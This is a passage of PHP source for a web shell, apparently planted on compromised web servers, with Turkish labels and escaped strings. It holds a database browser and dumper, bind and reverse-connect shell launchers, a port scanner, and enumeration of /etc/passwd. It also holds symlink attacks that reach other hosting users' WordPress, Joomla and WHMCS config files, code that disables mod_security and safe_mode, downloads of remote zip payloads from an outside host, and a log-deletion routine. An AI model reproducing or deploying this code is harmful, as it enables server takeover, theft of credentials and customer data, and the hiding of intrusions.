$name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cgi");\r\n $zip = new ZipArchive();\r\n $file = \'cgi.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cgi/\');\r\n if(file_exists(\'cgi.zip\')){ @unlink(\'cgi.zip\');\r\n } if($cikar){ chmod(\'cgi/rot.cin\', 0755);\r\n echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluştu.</div>\';\r\n } } elseif(file_exists(\'cgi/rot.cin\')){ echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionSql() { class DbClass { var $type;\r\n var $link;\r\n var $res;\r\n function DbClass($type) { $this->type = $type;\r\n } function connect($host, $user, $pass, $dbname){ switch($this->type) { case \'mysql\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n break;\r\n case \'pgsql\': $host = explode(\':\', $host);\r\n if(!$host[1]) $host[1]=5432;\r\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n break;\r\n } return false;\r\n } function selectdb($db) { switch($this->type) { case \'mysql\': if (@mysql_select_db($db))return true;\r\n break;\r\n } return false;\r\n } function query($str) { switch($this->type) { case \'mysql\': return $this->res = @mysql_query($str);\r\n break;\r\n case \'pgsql\': return $this->res = @pg_query($this->link,$str);\r\n break;\r\n } return false;\r\n } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res;\r\n 
switch($this->type) { case \'mysql\': return @mysql_fetch_assoc($res);\r\n break;\r\n case \'pgsql\': return @pg_fetch_assoc($res);\r\n break;\r\n } return false;\r\n } function listDbs() { switch($this->type) { case \'mysql\': return $this->res = @mysql_list_dbs($this->link);\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("SELECT datname FROM pg_database");\r\n break;\r\n } return false;\r\n } function listTables() { switch($this->type) { case \'mysql\': return $this->res = $this->query(\'SHOW TABLES\');\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != \'information_schema\' AND table_schema != \'pg_catalog\') or table_name = \'pg_user\'");\r\n break;\r\n } return false;\r\n } function error() { switch($this->type) { case \'mysql\': return @mysql_error($this->link);\r\n break;\r\n case \'pgsql\': return @pg_last_error($this->link);\r\n break;\r\n } return false;\r\n } function setCharset($str) { switch($this->type) { case \'mysql\': if(function_exists(\'mysql_set_charset\')) return @mysql_set_charset($str, $this->link);\r\n else $this->query(\'SET CHARSET \'.$str);\r\n break;\r\n case \'mysql\': return @pg_set_client_encoding($this->link, $str);\r\n break;\r\n } return false;\r\n } function dump($table) { switch($this->type) { case \'mysql\': $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n $create = mysql_fetch_array($res);\r\n echo $create[1].";\r\n\\n\\n";\r\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n $columns[] = "`".$k."`";\r\n } echo \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n case \'pgsql\': $this->query(\'SELECT * FROM \'.$table);\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as 
$k=>$v) { $item[$k] = "\'".addslashes($v)."\'";\r\n $columns[] = $k;\r\n } echo \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n } return false;\r\n } };\r\n $db = new DbClass(@$_POST[\'type\']);\r\n if(@$_POST[\'p2\']==\'download\') { ob_start("ob_gzhandler", 4096);\r\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n $db->selectdb($_POST[\'sql_base\']);\r\n header("Content-Disposition: attachment;\r\n filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v) $db->dump($v);\r\n exit;\r\n } printHeader();\r\n echo \'<h1>Sql browser</h1><div class=content>\r\n <form name="sf" method="post">\r\n <table cellpadding="2" cellspacing="0">\r\n <tr>\r\n <td>Type</td>\r\n <td>Host</td>\r\n <td>Login</td>\r\n <td>Password</td>\r\n <td>Database</td>\r\n <td></td>\r\n </tr>\r\n <tr>\r\n <input type=hidden name=a value=Sql>\r\n <input type=hidden name=p1 value=\\\'query\\\'>\r\n <input type=hidden name=p2>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <td>\r\n <select name=\\\'type\\\'>\r\n <option value="mysql" \'.(@$_POST[\'type\']==\'mysql\'?\'selected\':\'\').\'>MySql</option>\r\n <option value="pgsql" \'.(@$_POST[\'type\']==\'pgsql\'?\'selected\':\'\').\'>PostgreSql</option>\r\n </select></td>\r\n <td><input type=text name=sql_host value="\'.(empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])).\'"></td>\r\n <td><input type=text name=sql_login value="\'.(empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])).\'"></td>\r\n <td><input type=text name=sql_pass value="\'.(empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])).\'"></td>\r\n <td>\';\r\n $tmp = "<input type=text name=sql_base 
value=\'\'>";\r\n if(isset($_POST[\'sql_host\'])){ if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\');\r\n break;\r\n case "UTF-8": $db->setCharset(\'utf8\');\r\n break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\');\r\n break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\');\r\n break;\r\n case "cp866": $db->setCharset(\'cp866\');\r\n break;\r\n } $db->listDbs();\r\n echo "<select name=sql_base><option value=\'\'></option>";\r\n while($item = $db->fetch()) { list($key, $value) = each($item);\r\n echo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n } echo \'</select>\';\r\n } else echo $tmp;\r\n }else echo $tmp;\r\n echo \'</td>\r\n <td><input type=submit value=">>"></td>\r\n </tr>\r\n </table>\r\n <script>\r\n function st(t,l) {\r\n document.sf.p1.value = \\\'select\\\';\r\n\r\n document.sf.p2.value = t;\r\n\r\n if(l!=null)document.sf.p3.value = l;\r\n\r\n document.sf.submit();\r\n\r\n }\r\n function is() {\r\n for(i=0;\r\ni<document.sf.elements[\\\'tbl[]\\\'].length;\r\n++i)\r\n document.sf.elements[\\\'tbl[]\\\'][i].checked = !document.sf.elements[\\\'tbl[]\\\'][i].checked;\r\n\r\n }\r\n </script>\';\r\n if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>";\r\n if(!empty($_POST[\'sql_base\'])){ $db->selectdb($_POST[\'sql_base\']);\r\n echo "<tr><td width=1 style=\'border-top:2px solid #666;\r\nborder-right:2px solid #666;\r\n\'><span>Tables:</span><br><br>";\r\n $tbls_res = $db->listTables();\r\n while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item);\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n $value = htmlspecialchars($value);\r\n echo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'>&nbsp;\r\n<a href=# onclick=\\"st(\'".$value."\')\\">".$value."</a> 
(".$n[\'n\'].")</nobr><br>";\r\n } echo "<input type=\'checkbox\' onclick=\'is();\r\n\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";\r\ndocument.sf.submit();\r\n\'></td><td style=\'border-top:2px solid #666;\r\n\'>";\r\n if(@$_POST[\'p1\'] == \'select\') { $_POST[\'p1\'] = \'query\';\r\n $db->query(\'SELECT COUNT(*) as n FROM \'.$_POST[\'p2\'].\'\');\r\n $num = $db->fetch();\r\n $num = $num[\'n\'];\r\n echo "<span>".$_POST[\'p2\']."</span> ($num) ";\r\n for($i=0;\r\n$i<($num/30);\r\n$i++) if($i != (int)$_POST[\'p3\']) echo "<a href=\'#\' onclick=\'st(\\"".$_POST[\'p2\']."\\", $i)\'>",($i+1),"</a> ";\r\n else echo ($i+1)," ";\r\n if($_POST[\'type\']==\'pgsql\') $_POST[\'p3\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n else $_POST[\'p3\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n echo "<br><br>";\r\n } if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p3\'])) { $db->query(@$_POST[\'p3\']);\r\n if($db->res !== false) { $title = false;\r\n echo \'<table width=100% cellspacing=0 cellpadding=2 class=main>\';\r\n $line = 1;\r\n while($item = $db->fetch()) { if(!$title) { echo \'<tr>\';\r\n foreach($item as $key => $value) echo \'<th>\'.$key.\'</th>\';\r\n reset($item);\r\n $title=true;\r\n echo \'</tr><tr>\';\r\n $line = 2;\r\n } echo \'<tr class="l\'.$line.\'">\';\r\n $line = $line==1?2:1;\r\n foreach($item as $key => $value) { if($value == null) echo \'<td><i>null</i></td>\';\r\n else echo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n } echo \'</tr>\';\r\n } echo \'</table>\';\r\n } else { echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n } } echo "<br><textarea name=\'p3\' style=\'width:100%;\r\nheight:100px\'>".@htmlspecialchars($_POST[\'p3\'])."</textarea><br/><input type=submit value=\'Execute\'>";\r\n echo "</td></tr>";\r\n } echo "</table></form><br/><form 
onsubmit=\'document.sf.p1.value=\\"loadfile\\";\r\ndocument.sf.p2.value=this.f.value;\r\ndocument.sf.submit();\r\nreturn false;\r\n\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>";\r\n if(@$_POST[\'p1\'] == \'loadfile\') { $db->query("SELECT LOAD_FILE(\'".addslashes($_POST[\'p2\'])."\') as file");\r\n $file = $db->fetch();\r\n echo \'<pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionNetwork() { printHeader();\r\n $back_connect_c="";\r\n $back_connect_p="";\r\n $bind_port_c="";\r\n $bind_port_p="";\r\n echo \'<h1>Network tools</h1><div class=content>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);\r\nreturn false;\r\n">\r\n <br /><span>Bind port to /bin/sh</span><br/>\r\n Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Password: <input type=\\\'text\\\' name=\\\'pass\\\' value=\\\'smurf\\\'> Using: <select name="using"><option value=\\\'bpc\\\'>C</option><option value=\\\'bpp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);\r\nreturn false;\r\n">\r\n <br /><br /><span>Back-connect to</span><br/>\r\n Server: <input type=\\\'text\\\' name=\\\'server\\\' value="\'.$_SERVER[\'REMOTE_ADDR\'].\'"> Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Using: <select name="using"><option value=\\\'bcc\\\'>C</option><option value=\\\'bcp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form><br>\';\r\n if(isset($_POST[\'p1\'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n @fclose($w);\r\n } } if($_POST[\'p1\'] == \'bpc\') { 
cf("/tmp/bp.c",$bind_port_c);\r\n $out = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n @unlink("/tmp/bp.c");\r\n $out .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp")."</pre>";\r\n } if($_POST[\'p1\'] == \'bpp\') { cf("/tmp/bp.pl",$bind_port_p);\r\n $out = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp.pl")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcc\') { cf("/tmp/bc.c",$back_connect_c);\r\n $out = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n @unlink("/tmp/bc.c");\r\n $out .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcp\') { cf("/tmp/bc.pl",$back_connect_p);\r\n $out = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc.pl")."</pre>";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionPortScanner() { printHeader();\r\n echo \'<h1>Port Scanner</h1>\';\r\n echo \'<div class="content">\';\r\n echo \'<form action="" method="post">\';\r\n if(isset($_POST[\'host\']) && is_numeric($_POST[\'end\']) && is_numeric($_POST[\'start\'])){ $start = strip_tags($_POST[\'start\']);\r\n $end = strip_tags($_POST[\'end\']);\r\n $host = strip_tags($_POST[\'host\']);\r\n for($i = $start;\r\n $i<=$end;\r\n $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3);\r\n if($fp){ echo \'Port \'.$i.\' is <font color=green>open</font><br>\';\r\n } flush();\r\n } } else { echo \'<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">\r\n <input type="hidden" name="c" value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type="hidden" name="charset" value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n Host: <input type="text" name="host" value="localhost"/><br /><br />\r\n Port start: <input 
type="text" name="start" value="0"/><br /><br />\r\n Port end:<input type="text" name="end" value="5000"/><br /><br />\r\n <input type="submit" value="Scan Ports" />\r\n </form></center><br /><br />\';\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionReadable() { printHeader();\r\n echo \'<h1>Readable Dirs</h1>\';\r\n echo \'<div class="content">\';\r\n $sm = ini_get(\'safe_mode\');\r\n if($sm) { echo \'<br /><b>Error: safe_mode = on</b><br /><br />\';\r\n } else { @$passwd = fopen(\'/etc/passwd\',\'r\');\r\n if (!$passwd) { echo \'<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />\';\r\n } else { $pub = array();\r\n $users = array();\r\n $conf = array();\r\n $i = 0;\r\n while(!feof($passwd)) { $str = fgets($passwd);\r\n if ($i > 35) { $pos = strpos($str,\':\');\r\n $username = substr($str,0,$pos);\r\n $dirz = \'/home/\'.$username.\'/public_html/\';\r\n if (($username != \'\')) { if (is_readable($dirz)) { array_push($users,$username);\r\n array_push($pub,$dirz);\r\n } } } $i++;\r\n } echo \'<br><br>\';\r\n echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\\n"."<br />";\r\n echo "[+] Founded ".sizeof($pub)." 
readable public_html directories\\n"."<br /><br /><br />";\r\n foreach ($users as $user) { $path = "/home/$user/public_html/";\r\n echo $path."<br>";\r\n } echo "<br /><br /><br />[+] Complete...\\n"."<br />";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionSymlink() { printHeader();\r\n echo \'<h1>Symlink</h1>\';\r\n $furl = \'http://\'.$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'];\r\n $expld = explode(\'/\',$furl );\r\n $burl =str_replace(end($expld),\'\',$furl);\r\n echo \'<div class="content"><center>\r\n <h3>[ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'website\\\',null)">Domains</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'whole\\\',null)">Whole Server Symlink</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'config\\\',null)">Config files symlink</a> ]</h3></center>\';\r\n if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'website\') { echo "<center>";\r\n $d0mains = @file("/etc/named.conf");\r\n if(!$d0mains){ echo "<pre class=ml1 style=\'margin-top:5px\'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=center class=\'main\' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>";\r\n $unk = array();\r\n foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\n flush();\r\n if(strlen(trim($domains[1][0])) > 2){ $unk[] = $domains[1][0];\r\n flush();\r\n } } } $count=1;\r\n $unk = array_unique($unk);\r\n $l=0;\r\n foreach($unk as $d){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$d));\r\n echo "<tr".($l?\' class=l1\':\'\')."><td>".$count."</td><td><a href=http://".$d."/>".$d."</a></td><td>".$user[\'name\']."</td></tr>";\r\n flush();\r\n $count++;\r\n $l=$l?0:1;\r\n } echo "</table>";\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'whole\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType 
text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp =@fopen (\'sym/.htaccess\',\'w\');\r\n fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";\r\n $count=1;\r\n $mck = array();\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0];\r\n } } } $mck = array_unique($mck);\r\n $l=0;\r\n foreach($mck as $d) { $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$d));\r\n $ddt = $user[\'name\'];\r\n $ddt = $d;\r\n if(@eregi("\\.ir",$d) or @eregi("\\.il",$d)) { $ddt = "<div style=\' color: #FF0000 ;\r\n text-shadow: 0px 0px 1px red;\r\n \'>".$d.\'</div>\';\r\n } echo "<tr".($l?\' class=l1\':\'\')."><td>".$count++."</td><td><a target=\'_blank\' href=http://".$d.\'/>\'.$ddt.\' </a></td><td>\'.$user[\'name\']."</td><td><a href=\'sym/root/home/".$user[\'name\']."/public_html\' target=\'_blank\'>symlink </a></td></tr>";\r\n flush();\r\n $l=$l?0:1;\r\n } echo \'</table>\';\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'config\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp = @fopen (\'sym/.htaccess\',\'w\');\r\n @fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n 
if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\' ><tr><th> Count </th><th> Domains </th><th> Script </th></tr>";\r\n $count = 1;\r\n $l=0;\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0]))>2){ $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$domain[1][0]));\r\n $c1 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/wp-config.php\';\r\n $ch01 = get_headers($c1);\r\n $cf01 = $ch01[0];\r\n $c2 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/blog/wp-config.php\';\r\n $ch02 = get_headers($c2);\r\n $cf02 = $ch02[0];\r\n $c3 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/configuration.php\';\r\n $ch03 = get_headers($c3);\r\n $cf03 = $ch03[0];\r\n $c4 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/joomla/configuration.php\';\r\n $ch04 = get_headers($c4);\r\n $cf04 = $ch04[0];\r\n $c5 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/config.php\';\r\n $ch05 = get_headers($c5);\r\n $cf05 = $ch05[0];\r\n $c6 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/vb/includes/config.php\';\r\n $ch06 = get_headers($c6);\r\n $cf06 = $ch06[0];\r\n $c7 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/forum/includes/config.php\';\r\n $ch07 = get_headers($c7);\r\n $cf07 = $ch07[0];\r\n $c8 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'public_html/clients/configuration.php\';\r\n $ch08 = get_headers($c8);\r\n $cf08 = $ch08[0];\r\n $c9 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/support/configuration.php\';\r\n $ch09 = get_headers($c9);\r\n $cf09 = $ch09[0];\r\n $c10 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch10 = get_headers($c10);\r\n $cf10 = $ch10[0];\r\n $c11 = 
$burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/submitticket.php\';\r\n $ch11 = get_headers($c11);\r\n $cf11 = $ch11[0];\r\n $c12 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch12 = get_headers($c12);\r\n $cf12 = $ch12[0];\r\n $c13 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/configure.php\';\r\n $ch13 = get_headers($c13);\r\n $cf13 = $ch13[0];\r\n $c14 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/include/app_config.php\';\r\n $ch14 = get_headers($c14);\r\n $cf14 = $ch14[0];\r\n $c15 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/sites/default/settings.php\';\r\n $ch15 = get_headers($c15);\r\n $cf15 = $ch15[0];\r\n $out = \'&nbsp;\r\n\';\r\n if(strpos($cf01,\'200\') == true) { $out = "<a href=\'".$c1."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf02,\'200\') == true) { $out = "<a href=\'".$c2."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf03,\'200\') == true && strpos($cf11,\'200\') == true) { $out = " <a href=\'".$c11."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf09,\'200\') == true) { $out = " <a href=\'".$c9."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf10,\'200\') == true) { $out = " <a href=\'".$c10."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf03,\'200\') == true) { $out = " <a href=\'".$c3."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf04,\'200\') == true) { $out = " <a href=\'".$c4."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf05,\'200\') == true) { $out = " <a href=\'".$c5."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf06,\'200\') == true) { $out = " <a href=\'".$c6."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf07,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf08,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf12,\'200\') == 
true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf13,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>osCommerce/Zen Cart</a>";\r\n } elseif(strpos($cf14,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Magento</a>";\r\n } elseif(strpos($cf15,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Drupal</a>";\r\n } else { continue;\r\n } echo \'<tr\'.($l?\' class=l1\':\'\').\'><td>\'.$count++.\'</td><td><a href=http://www.\'.$domain[1][0].\'/>\'.$domain[1][0].\'</a></td><td>\'.$user[\'name\'].\'</td><td>\'.$out.\'</td></tr>\';\r\n flush();\r\n $l=$l?0:1;\r\n } } } echo "</table>";\r\n } echo "</center>";\r\n } echo "</div>";\r\n printFooter();\r\n } function actionSafeMode() { printHeader();\r\n echo \'<h1>Safe Mode</h1>\';\r\n echo \'<div class="content">\';\r\n echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS[\'cwd\']." 
|<br><br />";\r\n echo \'<a href=# onclick="g(null,null,\\\'php.ini\\\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\\\'ini\\\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\\\'sh\\\')">| .htaccess(perl) | </a></center>\';\r\n if(!empty($_POST[\'p2\']) && isset($_POST[\'p2\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'<IfModule mod_security.c>\r\n Sec------Engine Off\r\n Sec------ScanPOST Off\r\n </IfModule>\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p1\'])&& isset($_POST[\'p1\'])) { $fil=fopen($GLOBALS[\'cwd\']."php.ini","w");\r\n fwrite($fil,\'safe_mode=OFF\r\n disable_functions=NONE\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p3\']) && isset($_POST[\'p3\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'Options FollowSymLinks MultiViews Indexes ExecCGI\r\n AddType application/x-httpd-cgi .sh\r\n AddHandler cgi-script .pl\r\n AddHandler cgi-script .pl\');\r\n fclose($fil);\r\n } echo "<br><br /><br /></div>";\r\n echo \'</div>\';\r\n printFooter();\r\n} function actionSQLBUDDY(){ printHeader();\r\n if(!file_exists(\'yazilimlar/sqlbuddy/index.php\')){ $dizin = \'https://byr00t.co/vb/sqlbuddy.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? 
$name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "sqlbuddy");\r\n $zip = new ZipArchive();\r\n $file = \'sqlbuddy.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'yazilimlar/\');\r\n if(file_exists(\'sqlbuddy.zip\')){ @unlink(\'sqlbuddy.zip\');\r\n } if($cikar){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'yazilimlar/sqlbuddy/index.php\')){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionDeleteLOG(){ printHeader();\r\n echo \'<h1>Delete Logs</h1>\';\r\n function cmdExe($in) { $out = \'\';\r\n if (function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n } else if (function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n } elseif (function_exists(\'system\')) { ob_start();\r\n 